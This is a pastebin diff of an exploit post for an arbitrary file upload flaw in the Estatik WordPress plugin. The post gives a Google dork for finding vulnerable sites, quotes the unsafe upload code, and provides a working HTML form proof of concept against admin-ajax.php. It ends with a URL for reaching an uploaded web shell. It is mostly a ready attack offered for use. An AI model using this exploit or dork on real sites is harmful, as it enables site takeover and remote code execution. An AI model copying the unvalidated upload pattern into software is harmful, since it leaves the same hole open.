View difference between Paste ID: <a href="/FqCuquFp">FqCuquFp</a> and <a href="/keECw2wA">keECw2wA</a>

<!--
1		<!--
2
3
4		\ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
5		\ \ / /\| \| '__\| \| \| / __\|\ /\| \| \| \|_ /
6		\ V / \| \| \| \| \|_\| \__ \/ \\| \|_\| \|/ /
7		\_/ \|_\|_\| \__,_\|___/_/\_\____//___\|
8
9		-->
10		#########################################################
11		#Exploit Title: Arbitrary File Upload Vulnerability in Estatik
12		#Category: webapps
13		#Google Dork : inurl:/wp-content/plugins/estatik/
14		: index of "/wp-content/plugins/estatik/"
15		#########################################################
16
17		[+] In that function the following code saves an uploaded file sent with a request to the AJAX function:
18
19		$image_name = time()."_".$_FILES['es_media_images']['name'][$i];
20
21		$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
22
23		$targetPath = $upload_dir['path']."/".$image_name;
24
25		move_uploaded_file($sourcePath,$targetPath) ;
26
27		[+] Proof of Concept:
28
29		The following proof of concept will upload the selected file and put it in the current
30		month’s directory inside of the /wp-content/uploads/ directory.
31		The name of the file in the upload directory with be the time the file
32		was saved as output by the function time() followed by a “_”
33		and then name of the as it was uploaded.
34
35		Make sure to replace “[path to WordPress]” with the location of WordPress.
36
37		<html>
38		<body>
39		<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
40		<input type="hidden" name="action" value="es_prop_media_images" />
41		<input type="file" name="es_media_images[]" />
42		<input type="submit" value="Submit" />
43		</form>
44		</body>
45		</html>
46
47		[+]shell access:
48
49		http://www.Target.com/wp-content/uploads/time/shell.php
50
51		Video
52		https://youtu.be/G80_JRsuY88
53		Bye..
54		Algerien Hacker